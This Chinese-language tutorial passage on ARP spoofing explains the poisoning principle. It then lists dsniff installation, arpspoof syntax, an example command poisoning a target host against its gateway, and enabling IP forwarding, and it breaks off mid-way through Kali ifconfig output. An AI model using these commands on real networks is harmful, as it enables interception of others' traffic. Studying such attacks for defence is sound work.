ARP攻击与欺骗实战
ARP(Address Resolution Protocol,地址解析协议)是一个位于TCP/IP协议栈中的网络层,负责将某个IP地址解析成对应的MAC地址。
文章目录
ARP攻击原理
通过伪造IP地址和MAC地址的对应关系,使得网络无法正常通信。
ARP欺骗原理
欺骗源把自己伪装成网关(或另一台主机),向局域网内的目标主机发送ARP应答报文,使得局域网内的主机误以为欺骗源的MAC地址是网关(或另一台主机)的MAC地址,并将原本流向网关(或另一台主机)的数据都发送到欺骗源。
实施ARP欺骗
1.安装Arpspoof工具
sudo apt-get install dsniff
使用语法
arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
参数
-i interface 指定要使用的接口。
-c own|host|both 指定范围own|host|both(自己|主机|两者)
-t target 指定一台特定主机进行ARP中毒(如果未指定,则为LAN上的所有主机)
-r 毒害两个主机(主机和目标)以捕获两个方向的流量。(仅对-t有效)
host 指定您希望拦截数据包的host(通常是本地网关)
示例
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
192.168.1.100为攻击目标的IP,192.168.1.1为攻击目标的网关
2.开启路由转发
echo 1 > /proc/sys/net/ipv4/ip_forward
3.查看攻击机IP地址和ARP缓存表
查看IP地址:
root@kali:/home/sknife# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.0